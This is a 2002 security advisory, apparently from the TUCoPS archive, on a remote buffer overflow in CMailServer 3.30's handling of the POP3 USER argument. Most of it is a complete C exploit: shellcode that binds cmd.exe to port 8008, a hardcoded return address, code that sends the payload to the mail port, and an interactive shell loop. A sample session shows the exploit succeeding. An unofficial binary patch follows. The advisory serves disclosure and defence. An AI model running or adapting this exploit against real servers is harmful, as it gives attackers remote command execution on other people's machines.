22th May 2002 [SBWID-5358]
COMMAND
CMailServer remote buffer overflow
SYSTEMS AFFECTED
CMailServer 3.30
PROBLEM
2c79cbe14ac7d0b8472d3f129fa1df55, the original pimp, says :
CMailServer uses sprintf() without any previous bounds checking while
testing for the presence of the passed USER argument\'s home directory
within \'mail\'..
sprintf(%s\\\\mail\\\\%s, CMail path ptr, USER arg ptr)
you know how the story goes, we can overwrite some serious EIP action..
see attached exploit.. a patch has also been included to prevent
ownaging
Exploit
=======
/*
cmeexp.c
May 20, 2002
CMailServer 3.30 uses sprintf() without any previous
bounds checking while testing for the presence of the
passed USER argument\'s home directory within \'mail\'..
sprintf(%s\\\\mail\\\\%s, CMail path ptr, USER arg ptr)
you know how the story goes, we can overwrite some
serious EIP action..
USER <510 bytes><EIP>
the payload is on the right as I didn\'t bother finding
or making one fit on the left
[xx@xxxx cmail]$ ./cmeexp the.man
CMailServer 3.30 remote \'root\' exploit (05/20/2002)
2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com
connecting...
connected.. sending code
code dumped..
connecting to port 8008...
success! izn0rw3ned!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\\Program Files\\CMailServer>date
The current date is: Mon 20/05/2002
Enter the new date: (dd-mm-yy)
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
/* Win2k SP2 + all hotfixes up until May 20th */
/* you\'ve got one shot at this as cmail is */
/* going down if you miss.. */
/* this is the most consistant EIP hit on my */
/* test machine although freshly booted she */
/* tended to be \"\\x6d\\xa7\\xdb\\x02\" */
/* try in offsets of 0x100000 if you must.. */
#define EIP \"\\x6d\\xa7\\x0e\\x03\"
/* everything all rolled into one.. bind\'s cmd.exe */
/* to port 8008.. this is a modified version of the */
/* shellcode created by |Zan\'s excellent generator */
char shell[] =
\"\\x55\\x53\\x45\\x52\\x20\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\\x7f\"
\"\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\"
\"\\x7f\\x83\\xee\\x4c\\xff\\xd6\"EIP\"\\x55\\x8b\\xec\\x68\\x5e\\x56\\xc3\"
\"\\x90\\x54\\x59\\xff\\xd1\\x58\\x33\\xc9\\xb1\\x1c\\x90\\x90\\x90\\x90\"
\"\\x03\\xf1\\x56\\x5f\\x33\\xc9\\x66\\xb9\\x95\\x04\\x90\\x90\\x90\\xac\"
\"\\x34\\x13\\xaa\\xe2\\xfa\\xfb\\x13\\x13\\x13\\x13\\x4e\\x92\\xfe\\xca\"
\"\\x32\\x53\\x13\\x9e\\xa6\\xe1\\x37\\x53\\x13\\x9e\\xae\\xe9\\x37\\x53\"
\"\\x13\\x79\\x14\\x83\\x83\\x83\\x83\\x4a\\xfb\\xc1\\x11\\x13\\x13\\x9e\"
\"\\xa6\\x39\\x36\\x53\\x13\\x9e\\xae\\x20\\x36\\x53\\x13\\x79\\x19\\x83\"
\"\\x83\\x83\\x83\\x4a\\xfb\\xa9\\x11\\x13\\x13\\x79\\x13\\x9e\\xa6\\xca\"
\"\\x36\\x53\\x13\\x45\\x9e\\xa6\\xf6\\x36\\x53\\x13\\x45\\x9e\\xa6\\xfa\"
\"\\x36\\x53\\x13\\x45\\xec\\x86\\x20\\x36\\x53\\x13\\x79\\x13\\x9e\\xa6\"
\"\\xca\\x36\\x53\\x13\\x45\\x9e\\xa6\\xfe\\x36\\x53\\x13\\x45\\x9e\\xa6\"
\"\\xe2\\x36\\x53\\x13\\x45\\xec\\x86\\x20\\x36\\x53\\x13\\xd4\\x96\\xe6\"
\"\\x36\\x53\\x13\\x57\\x13\\x13\\x13\\x9e\\xa6\\xe6\\x36\\x53\\x13\\x45\"
\"\\xec\\x86\\x24\\x36\\x53\\x13\\x9e\\xa6\\x3e\\x35\\x53\\x13\\xbe\\x43\"
\"\\xec\\x86\\x40\\x36\\x53\\x13\\x9e\\xa6\\x22\\x35\\x53\\x13\\xbe\\x43\"
\"\\xec\\x86\\x40\\x36\\x53\\x13\\x9e\\xa6\\xe2\\x36\\x53\\x13\\x9e\\xae\"
\"\\x3e\\x35\\x53\\x13\\xb6\\x9e\\xa6\\xf6\\x36\\x53\\x13\\xbe\\x9e\\xae\"
\"\\x22\\x35\\x53\\x13\\xb8\\x9e\\xae\\x26\\x35\\x53\\x13\\xb8\\xd4\\x96\"
\"\\x36\\x35\\x53\\x13\\x13\\x13\\x13\\x13\\xd4\\x96\\x32\\x35\\x53\\x13\"
\"\\x12\\x12\\x13\\x13\\x9e\\xa6\\x2a\\x35\\x53\\x13\\x45\\x9e\\xa6\\xe6\"
\"\\x36\\x53\\x13\\x45\\x79\\x13\\x79\\x13\\x79\\x03\\x79\\x12\\x79\\x13\"
\"\\x79\\x13\\x9e\\xa6\\x5a\\x35\\x53\\x13\\x45\\x79\\x13\\xec\\x86\\x28\"
\"\\x36\\x53\\x13\\x7b\\x13\\x33\\x13\\x13\\x83\\x7b\\x13\\x11\\x13\\x13\"
\"\\xec\\x86\\x50\\x36\\x53\\x13\\x9a\\x96\\x42\\x35\\x53\\x13\\x20\\xd3\"
\"\\x43\\x53\\x43\\x53\\x43\\xec\\x86\\xe9\\x37\\x53\\x13\\x43\\x48\\x79\"
\"\\x03\\x9e\\xa6\\xda\\x36\\x53\\x13\\x45\\x40\\xec\\x86\\xed\\x37\\x53\"
\"\\x13\\x79\\x10\\x40\\xec\\x86\\x11\\x36\\x53\\x13\\x9e\\xa6\\x46\\x35\"
\"\\x53\\x13\\x45\\x9e\\xa6\\xda\\x36\\x53\\x13\\x45\\x40\\xec\\x86\\x15\"
\"\\x36\\x53\\x13\\x9e\\xae\\x4a\\x35\\x53\\x13\\xb8\\x20\\xd3\\x43\\x9e\"
\"\\xae\\x76\\x35\\x53\\x13\\x44\\x43\\x43\\x43\\x9e\\xa6\\xfa\\x36\\x53\"
\"\\x13\\xbe\\x43\\xec\\x86\\x2c\\x36\\x53\\x13\\x79\\x23\\xec\\x86\\x5c\"
\"\\x36\\x53\\x13\\xf8\\x5e\\x83\\x83\\x83\\x20\\xd3\\x43\\x9e\\xae\\x76\"
\"\\x35\\x53\\x13\\x44\\x43\\x43\\x43\\x9e\\xa6\\xfa\\x36\\x53\\x13\\xbe\"
\"\\x43\\xec\\x86\\x2c\\x36\\x53\\x13\\x79\\x43\\xec\\x86\\x5c\\x36\\x53\"
\"\\x13\\x90\\xae\\x76\\x35\\x53\\x13\\x11\\x1c\\x91\\x04\\x12\\x13\\x13\"
\"\\x92\\xae\\x76\\x35\\x53\\x13\\x12\\x33\\x13\\x13\\x61\\x1d\\x83\\x83\"
\"\\x83\\x83\\xd4\\x96\\x76\\x35\\x53\\x13\\x13\\x33\\x13\\x13\\x79\\x13\"
\"\\x98\\x96\\x76\\x35\\x53\\x13\\x9e\\xae\\x76\\x35\\x53\\x13\\x44\\x43\"
\"\\x98\\x96\\x42\\x35\\x53\\x13\\x43\\x9e\\xa6\\xfa\\x36\\x53\\x13\\xbe\"
\"\\x43\\xec\\x86\\x54\\x36\\x53\\x13\\x79\\x43\\xec\\x86\\x5c\\x36\\x53\"
\"\\x13\\x98\\x96\\x76\\x35\\x53\\x13\\x79\\x13\\x43\\x9e\\xa6\\x42\\x35\"
\"\\x53\\x13\\xbe\\x43\\x9e\\xa6\\x4a\\x35\\x53\\x13\\xbe\\x43\\xec\\x86\"
\"\\x19\\x36\\x53\\x13\\x79\\x13\\x9e\\xae\\x76\\x35\\x53\\x13\\x44\\x79\"
\"\\x13\\x79\\x13\\x79\\x13\\x9e\\xa6\\xfa\\x36\\x53\\x13\\xbe\\x43\\xec\"
\"\\x86\\x2c\\x36\\x53\\x13\\x79\\x43\\xec\\x86\\x5c\\x36\\x53\\x13\\x20\"
\"\\xda\\x2a\\x9e\\x76\\x35\\x53\\x13\\x1c\\x94\\x74\\xec\\xec\\xec\\x79\"
\"\\x13\\x7b\\x13\\x33\\x13\\x13\\x83\\x9e\\xa6\\x42\\x35\\x53\\x13\\xbe\"
\"\\x43\\x9e\\xa6\\x4a\\x35\\x53\\x13\\xbe\\x43\\xec\\x86\\x1d\\x36\\x53\"
\"\\x13\\x9a\\x96\\x72\\x35\\x53\\x13\\x79\\x13\\x9e\\xae\\x76\\x35\\x53\"
\"\\x13\\x44\\x43\\x9e\\xa6\\x42\\x35\\x53\\x13\\xbe\\x43\\x9e\\xa6\\xfe\"
\"\\x36\\x53\\x13\\xbe\\x43\\xec\\x86\\x58\\x36\\x53\\x13\\x79\\x43\\xec\"
\"\\x86\\x5c\\x36\\x53\\x13\\x79\\x13\\x98\\x96\\x72\\x35\\x53\\x13\\x9e\"
\"\\xae\\x76\\x35\\x53\\x13\\x44\\x43\\x98\\x96\\x42\\x35\\x53\\x13\\x43\"
\"\\x9e\\xa6\\xfa\\x36\\x53\\x13\\xbe\\x43\\xec\\x86\\x54\\x36\\x53\\x13\"
\"\\x79\\x43\\xec\\x86\\x5c\\x36\\x53\\x13\\xfa\\xaa\\xed\\xec\\xec\\x9e\"
\"\\xa6\\x4a\\x35\\x53\\x13\\xbe\\x43\\xec\\x86\\x01\\x36\\x53\\x13\\x9e\"
\"\\xa6\\x4e\\x35\\x53\\x13\\xbe\\x43\\xec\\x86\\x01\\x36\\x53\\x13\\x79\"
\"\\x13\\xec\\x86\\x44\\x36\\x53\\x13\\x42\\x45\\x7b\\xd3\\xf1\\x56\\x13\"
\"\\x83\\x49\\xec\\x01\\x43\\x48\\x4a\\x44\\x4d\\x42\\x45\\x40\\x7b\\xd7\"
\"\\xf1\\x56\\x13\\x83\\x49\\xec\\x01\\x43\\xbf\\x97\\xd3\\x66\\xe8\\x4b\"
\"\\xb8\\x4a\\xf1\\xfa\\xd0\\x44\\x40\\x5c\\x50\\x58\\x20\\x21\\x13\\x60\"
\"\\x7c\\x70\\x78\\x76\\x67\\x13\\x71\\x7a\\x7d\\x77\\x13\\x7f\\x7a\\x60\"
\"\\x67\\x76\\x7d\\x13\\x72\\x70\\x70\\x76\\x63\\x67\\x13\\x60\\x76\\x7d\"
\"\\x77\\x13\\x61\\x76\\x70\\x65\\x13\\x70\\x7f\\x7c\\x60\\x76\\x60\\x7c\"
\"\\x70\\x78\\x76\\x67\\x13\\x58\\x56\\x41\\x5d\\x56\\x5f\\x20\\x21\\x13\"
\"\\x50\\x61\\x76\\x72\\x67\\x76\\x43\\x7a\\x63\\x76\\x13\\x54\\x76\\x67\"
\"\\x40\\x67\\x72\\x61\\x67\\x66\\x63\\x5a\\x7d\\x75\\x7c\\x52\\x13\\x50\"
\"\\x61\\x76\\x72\\x67\\x76\\x43\\x61\\x7c\\x70\\x76\\x60\\x60\\x52\\x13\"
\"\\x43\\x76\\x76\\x78\\x5d\\x72\\x7e\\x76\\x77\\x43\\x7a\\x63\\x76\\x13\"
\"\\x54\\x7f\\x7c\\x71\\x72\\x7f\\x52\\x7f\\x7f\\x7c\\x70\\x13\\x41\\x76\"
\"\\x72\\x77\\x55\\x7a\\x7f\\x76\\x13\\x44\\x61\\x7a\\x67\\x76\\x55\\x7a\"
\"\\x7f\\x76\\x13\\x40\\x7f\\x76\\x76\\x63\\x13\\x50\\x7f\\x7c\\x60\\x76\"
\"\\x5b\\x72\\x7d\\x77\\x7f\\x76\\x13\\x56\\x6b\\x7a\\x67\\x43\\x61\\x7c\"
\"\\x70\\x76\\x60\\x60\\x13\\x50\\x7c\\x77\\x76\\x77\\x33\\x71\\x6a\\x33\"
\"\\x6f\\x49\\x72\\x7d\\x33\\x2f\\x7a\\x69\\x72\\x7d\\x53\\x77\\x76\\x76\"
\"\\x63\\x69\\x7c\\x7d\\x76\\x3d\\x7c\\x61\\x74\\x2d\\x11\\x13\\x0c\\x5b\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x1f\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x12\\x13\\x13\\x13\\x13\\x13\\x13\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x50\\x5e\"
\"\\x57\\x3d\\x56\\x4b\\x56\\x13\\x13\\x13\\x13\\x13\\x03\\x13\\x13\\x13\"
\"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\"
\"\\x13\\x13\\x1a\\x1a\\x1a\\x1a\\x1a\\x90\\x90\\x90\\x0d\\x0a\";
main(char argc, char **argv){
int fd;
int bufsize = 1024;
int buffer = malloc(bufsize);
struct sockaddr_in sin;
struct hostent *he;
struct in_addr in;
printf(\"CMailServer 3.30 remote \'root\' exploit (05/20/2002)\\n\");
printf(\"2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com\\n\\n\\n\");
if (argc < 2){
printf(\"Usage: <hostname>\\n\");
exit(-1);
}
if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror(\"socket error\");exit(-1);}
if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}
else
if ((inet_aton(argv[1], &in)) < 0){printf(\"unable to resolve host\");exit(-1);}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));
sin.sin_port = htons(110);
printf(\"connecting...\\n\");
if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror(\"connection error\");exit(-1);}
printf(\"\\nconnected.. sending code\\n\\n\");
if(write(fd, shell, strlen(shell)) < strlen(shell)){perror(\"write error\");exit(-1);}
printf(\"code dumped..\\n\\n\");
close(fd);
if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror(\"socket error\");exit(-1);}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(8008);
printf(\"connecting to tcp port 8008...\\n\");
sleep(1);
if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){printf(\"exploit failed.. adjust EIP?\\n\\n\");exit(-1);}
printf(\"success! izn0rw3ned!\\n\\n\");
while(1) {
fd_set input;
FD_SET(0,&input);
FD_SET(fd,&input);
if((select(fd+1,&input,NULL,NULL,NULL))<0) {
if(errno==EINTR) continue;
printf(\"connection reset\\n\"); fflush(stdout);
exit(1);
}
if(FD_ISSET(fd,&input))
write(1,buffer,read(fd,buffer,bufsize));
if(FD_ISSET(0,&input))
write(fd,buffer,read(0,buffer,bufsize));
}
close(fd);
}
SOLUTION
Unofficial patcher for v.3.30 :
/*
cmepatch.c
May 20, 2002
this is a quick and dirty patch.. it simply adds functionality that
inserts a NULL as the 200th byte of the passed USER argument prior
to the affected sprintf().. not even remotely elegant but enough to
stop you from getting izn0wn3D
I TAKE NO RESPONSIBILITY FOR THE DAMAGE THIS MAY DO
TO YOUR SYSTEM, EGO, WEEWEE, OR OTHERWISE ;~~~~~<
2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com
*/
#include <stdio.h>
FILE *cmail;
char p1[] = {0x00,0xd0};
char p2[] = {0xe9,0x16,0x82,0x04,0x00,0x90,0x90};
char p3[] = {0x81,0xc4,0x15,0x24,0x00,0x00,0xc6,0x04,0x24,0x00,0x81,0xec,0x15,0x24,0x00,0x00,
0x8d,0xbc,0x24,0x4d,0x23,0x00,0x00,0xe9,0xd0,0x7d,0xfb,0xff,0x90};
void main(){
printf(\"CMailServer 3.30 PATCH (May 20, 2002)\\n2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com\\n\\n\");
cmail = fopen(\"CMailServer.exe\", \"rb+\");
if(!cmail){printf(\"\'CMailServer.exe\' not found or write protected\\n\");return;}
fseek(cmail,0x1e8,0);
fwrite(&p1,sizeof(p1),1,cmail);
fseek(cmail,0x159f4,0);
fwrite(&p2,sizeof(p2),1,cmail);
fseek(cmail,0x5dc0f,0);
fwrite(&p3,sizeof(p3),1,cmail);
fclose(cmail);
printf(\"patch successful\\n\");
}
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
